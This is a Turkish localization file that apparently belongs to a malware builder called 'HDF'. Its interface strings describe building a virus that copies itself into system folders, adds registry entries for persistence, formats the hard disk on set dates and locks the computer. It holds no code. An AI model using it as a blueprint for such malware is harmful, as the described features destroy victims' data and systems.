[headers]
header1=HDF Ayarları
header2=Formattan Önce
header3=Formattan Sonra
header4=Oluştur

[header1]
item1=Uygulama Ayarları
item2=Dosya Adı :
item3=Kendini Windows dizinine kopyala.
item4=Kendini Sistem dizinine kopyala.
item5=Simge Ayarları
item6=Simge Yolu :
item7=Resim :

[header2]
item1=Kayıt Defteri Ayarları
item2=Format Anahtarı :
item3=Dosyayı HKEY_CURRENT_USER'a ekle.
item4=Dosyayı HKEY_LOCAL_MACHINE'e ekle.
item5=Aktivasyon Ayarları
item6=Hard diski direk formatla.
item7=Bilgisayarı kitle.
item8=Ayda bir formatla.
item9=Gün :
item10=Yılda bir formatla.
item11=Gün :
item12=Ay :

[header3]
item1=Mesaj Ayarları
item2=Mesajı Göster

[header4]
item1=Konum Ayarları
item2=Konum :
item3=Oluşturma Ayarları
item4=Boyut :
item5=Küçük
item6=Büyük
item7=Oluşturma İlerlemesi
item8=Virüsünüzü oluşturmak için butona tıklayın.
item9=Virüsü Oluştur

[summary]
item1=Oluşturma Özeti
item2=Kaydedilen :
item3=Boyut :
item4=Uyarı
item5=Oluşturulan dosyayı kendi bilgisayarınızda açmayın!
item6=Yeni bir tane oluştur
item7=Çıkış

[language]
item1=Dil Ayarları
item2=Geçerli Dil :

[messages]
msg1=Virüs oluşturuluyor...
msg2=Simge boyutu çok büyük. Başka bir simge seçin.
msg3=Tüm alanları doldurun.
msg4=Virüsünüz oluşturuldu!